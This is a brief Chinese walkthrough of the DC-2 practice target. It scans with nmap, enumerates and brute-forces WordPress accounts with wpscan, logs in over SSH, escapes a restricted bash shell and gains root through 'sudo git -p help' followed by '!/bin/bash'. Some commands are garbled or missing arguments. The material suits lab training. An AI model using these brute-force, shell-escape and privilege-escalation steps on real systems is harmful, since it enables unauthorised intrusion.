靶机DC-2（靶机是什么意思）

靶机DC-2（靶机是什么意思）

靶机DC-2

简述

靶机地址：-p-

nmap -P- 192.168.48.142

这个网站应该不难看出是wordpress使用wpscan枚举下用户名，跑出了三个用户名

wpscan --url -e u

用wpscan进行暴破削微等一下，暴出来两个账户的密码

wpscan --url -U id.txt -P dc2.txt

然后试下ssh登录，记得加上后面的参数，-p -lJerry账号登录失败

ssh 192.168.48.142 -p 7744 -l tom

看到错误提示是rbash，需要进行rbash绕过

BASH_CMDS[a]=/bin/sh;a export PATH=$PATH:/bin/ export PATH=$PATH:/usr/bin su jerry

进行提权看到git有root权限输入sudo git -p help后直接输入!/bin/bash即可完成提权

sudo -l sudo git -p help !/bin/bash

END

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。